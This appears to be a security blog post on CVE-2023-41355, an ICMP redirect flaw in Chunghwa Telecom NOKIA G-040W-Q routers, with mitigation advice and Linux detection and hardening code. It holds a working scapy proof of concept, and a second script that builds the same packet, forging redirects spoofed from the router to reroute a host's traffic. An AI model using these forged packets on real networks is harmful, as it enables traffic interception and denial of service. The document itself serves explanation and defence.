CVE-2023-41355 - Serious ICMP Redirect Vulnerability in Chunghwa Telecom NOKIA G-040W-Q Routers

A high-severity vulnerability tracked as CVE-2023-41355 has been found in the firewall function of the Chunghwa Telecom NOKIA G-040W-Q router. The flaw lets an unauthenticated, remote attacker alter the device's routing table by sending specially crafted ICMP redirect messages. This post breaks down what the vulnerability is, why it matters, how it works, how attackers exploit it, and what you can do to protect yourself.

- Attack Vector: Remote, unauthenticated (no login required)
- Impact: Malicious changes to the network routing table, leading to denial of service (DoS) or information leaks
- CVSS Score: 7.5 (High)

Why Is This Vulnerability Serious?

ICMP redirect messages are sent by routers to tell a host that a better first hop exists for a particular destination. A host or firewall that accepts them without checking who sent them and where they point is placing blind trust in the network. An attacker who can forge them can:

- Reroute traffic for a destination through a machine they control and read anything that is not encrypted (information leakage)
- Point traffic at a gateway that does not exist, so it is silently dropped (denial of service)

This affects both home users and small businesses because the NOKIA G-040W-Q is a standard-issue fiber router for Chunghwa Telecom subscribers.

How Does the Exploit Work?

1. No Authentication Needed: Anyone on your network, or potentially from the wider internet if ICMP isn't filtered at the WAN side, can send a crafted ICMP redirect packet.
2. Forged Packet: The attacker builds an ICMP redirect that falsely claims a "better" gateway for a chosen destination, spoofing the source address so it appears to come from the legitimate router.
3. Router Trusts the Message: Because the firewall does not validate the redirect properly, the device installs the bogus next hop in its routing table.
4. Routing Table Compromised: Traffic for the redirected destination now goes to the attacker's machine, or to a dead address if the goal is simply to cut the connection.

Code Snippet: Generating a Crafty ICMP Redirect Packet

Below is a simple proof-of-concept in Python using scapy. It sends a forged ICMP redirect, with the router's address as the source, to a LAN host behind a G-040W-Q; a real ICMP redirect sent by the router itself would have exactly this shape, which is why it is accepted:

from scapy.all import IP, ICMP, send

victim_ip = "192.168.1.100"     # LAN host whose route to 8.8.8.8 we want to hijack
fake_gateway = "192.168.1.200"  # attacker-controlled machine on the same subnet
target = "192.168.1.1"          # the router; its address is forged as the sender

# Type 5, code 1 = "redirect datagrams for the host". A receiver only honours a
# redirect that appears to come from its current gateway and that quotes a
# packet it actually sent, so the outer IP header is spoofed as the router and
# the quoted inner header mirrors a victim -> 8.8.8.8 echo request.
icmp_redirect = IP(src=target, dst=victim_ip) / \
                ICMP(type=5, code=1, gw=fake_gateway) / \
                IP(src=victim_ip, dst="8.8.8.8") / ICMP()

send(icmp_redirect)  # layer-3 send; needs raw-socket privileges (root)

- victim_ip: The LAN host whose route is being poisoned.
- fake_gateway: The attacker's machine; it must sit on the victim's subnet for the redirect to be usable.
- target: The router itself; the packet is spoofed to look as if the router sent it.
- Effect: The victim now sends its Google (8.8.8.8) traffic via the attacker's gateway instead of the router.

Note:
Do *not* use this against networks you don't own. It's illegal and unethical.
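To show what a receiver is supposed to check before installing a redirect, and why those checks do not stop the PoC above, here is an added example that is not part of the original post. It rebuilds the same redirect with only the Python standard library, parses it back from raw bytes, and applies the acceptance rules from RFC 1122 section 3.2.2.2. The addresses and the 192.168.1.0/24 network are assumptions chosen to match the PoC; the packet is a raw IPv4 datagram without an Ethernet header.

```python
"""Build, parse and sanity-check ICMP Redirect messages (RFC 792 type 5).

Added example, not code from the original post or from the vendor.
"""
import ipaddress
import struct
from typing import Dict, Optional, Tuple


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum used by IPv4 and ICMP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src: str, dst: str, proto: int, payload: bytes, ttl: int = 64) -> bytes:
    """Minimal IPv4 header (no options) with a correct header checksum."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, ttl, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    hdr = hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]
    return hdr + payload


def build_redirect(router: str, victim: str, new_gw: str, original_dst: str, code: int = 1) -> bytes:
    """Forge the same redirect as the scapy PoC: 'router' tells 'victim' to reach
    original_dst via new_gw. The quoted datagram is an echo request from victim
    to original_dst (IP header plus first 8 bytes, as RFC 792 requires)."""
    echo = struct.pack("!BBHHH", 8, 0, 0, 0, 0)
    echo = echo[:2] + struct.pack("!H", checksum(echo)) + echo[4:]
    quoted = build_ipv4(victim, original_dst, 1, echo)
    body = struct.pack("!BBH4s", 5, code, 0, ipaddress.IPv4Address(new_gw).packed) + quoted[:28]
    body = body[:2] + struct.pack("!H", checksum(body)) + body[4:]
    return build_ipv4(router, victim, 1, body)


def parse_redirect(packet: bytes) -> Optional[Dict[str, object]]:
    """Return the fields of an ICMP Redirect carried in a raw IPv4 packet, or
    None if the packet is not a well-formed redirect with a valid checksum."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 1 or len(packet) < ihl + 8 + 28:
        return None
    icmp = packet[ihl:]
    itype, code, _csum, gw = struct.unpack("!BBH4s", icmp[:8])
    if itype != 5 or checksum(icmp) != 0:
        return None
    quoted = icmp[8:]
    return {
        "src": str(ipaddress.IPv4Address(packet[12:16])),
        "dst": str(ipaddress.IPv4Address(packet[16:20])),
        "code": code,
        "gateway": str(ipaddress.IPv4Address(gw)),
        "quoted_src": str(ipaddress.IPv4Address(quoted[12:16])),
        "quoted_dst": str(ipaddress.IPv4Address(quoted[16:20])),
    }


def redirect_verdict(fields: Dict[str, object], current_gateway: str, local_net: str,
                     accept_redirects: bool = True) -> Tuple[bool, str]:
    """Apply the RFC 1122 3.2.2.2 checks a host should make before installing a
    redirect. The PoC passes every one of them, because it spoofs the current
    gateway and names an on-link next hop; only refusing redirects outright
    (accept_redirects=False) defeats it."""
    if not accept_redirects:
        return False, "redirects disabled"
    if fields["src"] != current_gateway:
        return False, "not from the current first-hop gateway"
    if ipaddress.ip_address(str(fields["gateway"])) not in ipaddress.ip_network(local_net):
        return False, "new gateway is not on a directly connected network"
    if fields["quoted_src"] != fields["dst"]:
        return False, "quoted datagram was not sent by this host"
    if fields["code"] not in (0, 1, 2, 3):
        return False, "unknown redirect code"
    return True, "accepted"


if __name__ == "__main__":
    pkt = build_redirect("192.168.1.1", "192.168.1.100", "192.168.1.200", "8.8.8.8")
    fields = parse_redirect(pkt)
    print(fields)
    print(redirect_verdict(fields, "192.168.1.1", "192.168.1.0/24"))
    print(redirect_verdict(fields, "192.168.1.1", "192.168.1.0/24", accept_redirects=False))
```

The point of the verdict function is the negative result: source validation and the on-link rule reject sloppy forgeries, but a redirect that claims the router's own address and points inside the LAN is indistinguishable from a genuine one at the packet level. That is why the practical fix on both routers and hosts is to stop accepting redirects rather than to filter them more cleverly.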

Real-World Attack Scenarios

- Man-in-the-Middle Attack: The attacker reroutes a victim's traffic through a machine they control and intercepts sensitive information such as passwords or personal data.
- Denial of Service: The attacker routes traffic into a black hole, disconnecting devices from the destination or from the internet entirely.
- Eavesdropping on IoT Devices: Attackers use this to capture data from smart home gadgets that don't use encrypted connections.

Exploit References

- NVD (Official CVE entry): https://nvd.nist.gov/vuln/detail/CVE-2023-41355
- TWCERT/CC Advisory: https://www.twcert.org.tw/tw/cp-132-7448-48847-1.html
- scapy documentation: https://scapy.readthedocs.io/en/latest/usage.html
- ICMP Redirect Explanation: https://en.wikipedia.org/wiki/ICMP_Redirect

How To Protect Yourself

- Update Firmware: The G-040W-Q is ISP-managed, so ask Chunghwa Telecom for a fixed firmware or check the router's settings for a newer version that addresses this issue.
- Block ICMP Redirects: Many routers allow you to disable ICMP redirects or set strict firewall rules. Do the same on the hosts behind the router, which receive the redirect in the PoC above: on Linux that means setting accept_redirects and secure_redirects to 0.
- Scan Your Network: Use tools such as arping and ip route (or the older route command) to spot gateway entries that point somewhere other than the router.
- Segregate Networks: Keep guest and IoT devices separate from main workstations to lower exposure.
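For the "Scan Your Network" and "Block ICMP Redirects" advice, here is an added example for Linux hosts behind the router; it is not code from the original post or from the vendor. It finds routes that the kernel installed because of a redirect by parsing text in the format of `ip route get <dst>`, audits `sysctl -a` output for the redirect-related keys, and emits a sysctl.d drop-in that turns them off. The sample outputs are constructed for the example, not captured from a real G-040W-Q network, and the expected gateway 192.168.1.1 is an assumption.

```python
"""Host-side detection and hardening against ICMP redirects on Linux.

Added example, not from the original post. Parses `ip route get` and
`sysctl -a` style text; the samples below are constructed, not captured.
"""
import re
from typing import Dict, List

# Constructed sample: `ip route get 8.8.8.8` and `ip route get 1.1.1.1` after a
# host accepted a redirect for 8.8.8.8. The kernel marks such cached routes
# with "<redirected>"; the 1.1.1.1 route still goes via the real router.
SAMPLE_IP_ROUTE = """\
8.8.8.8 via 192.168.1.200 dev eth0 src 192.168.1.100 uid 1000
    cache <redirected>
1.1.1.1 via 192.168.1.1 dev eth0 src 192.168.1.100 uid 1000
    cache
"""

# Constructed sample of `sysctl -a` with the defaults most distributions ship.
SAMPLE_SYSCTL = """\
net.ipv4.conf.all.accept_redirects = 1
net.ipv4.conf.default.accept_redirects = 1
net.ipv4.conf.all.secure_redirects = 1
net.ipv4.conf.all.send_redirects = 1
net.ipv4.conf.default.send_redirects = 1
net.ipv6.conf.all.accept_redirects = 1
net.ipv4.ip_forward = 0
"""

# Keys whose only safe value on an end host is 0. secure_redirects is included
# because it still accepts redirects from any address in the default-gateway
# list, which a packet spoofed from the router's IP satisfies.
REDIRECT_KEYS = (
    "net.ipv4.conf.all.accept_redirects",
    "net.ipv4.conf.default.accept_redirects",
    "net.ipv4.conf.all.secure_redirects",
    "net.ipv4.conf.default.secure_redirects",
    "net.ipv4.conf.all.send_redirects",
    "net.ipv4.conf.default.send_redirects",
    "net.ipv6.conf.all.accept_redirects",
    "net.ipv6.conf.default.accept_redirects",
)


def find_redirected_routes(ip_route_text: str, expected_gateway: str) -> List[Dict[str, str]]:
    """Return destinations whose route was installed by a redirect, or whose
    next hop is not the gateway we expect on this LAN."""
    findings = []
    # Each `ip route get` answer is one line plus indented continuation lines.
    for entry in re.split(r"\n(?=\S)", ip_route_text.strip()):
        m = re.match(r"(\S+) via (\S+) dev (\S+)", entry)
        if not m:
            continue
        dst, via, dev = m.groups()
        redirected = "<redirected>" in entry
        if redirected or via != expected_gateway:
            findings.append({"dst": dst, "via": via, "dev": dev,
                             "reason": "redirected" if redirected else "unexpected gateway"})
    return findings


def audit_sysctl(sysctl_text: str) -> List[str]:
    """Return the redirect-related sysctl keys whose current value is not 0.
    Keys absent from the text are not reported."""
    values = {}
    for line in sysctl_text.splitlines():
        if "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            values[key] = value
    return [key for key in REDIRECT_KEYS if values.get(key, "0") != "0"]


def hardened_sysctl_conf() -> str:
    """Contents for a drop-in such as /etc/sysctl.d/90-no-redirects.conf that
    makes the host ignore ICMP redirects and never send them."""
    return "".join(f"{key} = 0\n" for key in REDIRECT_KEYS)


if __name__ == "__main__":
    for hit in find_redirected_routes(SAMPLE_IP_ROUTE, "192.168.1.1"):
        print("suspicious route:", hit)
    print("weak sysctl keys:", audit_sysctl(SAMPLE_SYSCTL))
    print(hardened_sysctl_conf())
```

On a live host, feed the functions real output (`ip route get 8.8.8.8` for each destination you care about, `sysctl -a 2>/dev/null`), then apply the generated drop-in with `sysctl --system`. Disabling redirects on the host does not fix the router's own routing table, which only a firmware update from the ISP can do, but it stops the LAN-side attack shown in the PoC from landing on your machines.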

Conclusion

CVE-2023-41355 highlights how missing input validation in a firewall, even for a "simple" protocol like ICMP, can put thousands of homes and businesses at risk. Don't overlook your router's security: keep it updated, monitor your traffic, and contact your ISP if you suspect your device is vulnerable.
For more technical details and guidance, see the official TWCERT/CC bulletin or your device manual.

Timeline

Published on: 11/03/2023 06:15:07 UTC
Last modified on: 11/13/2023 19:54:23 UTC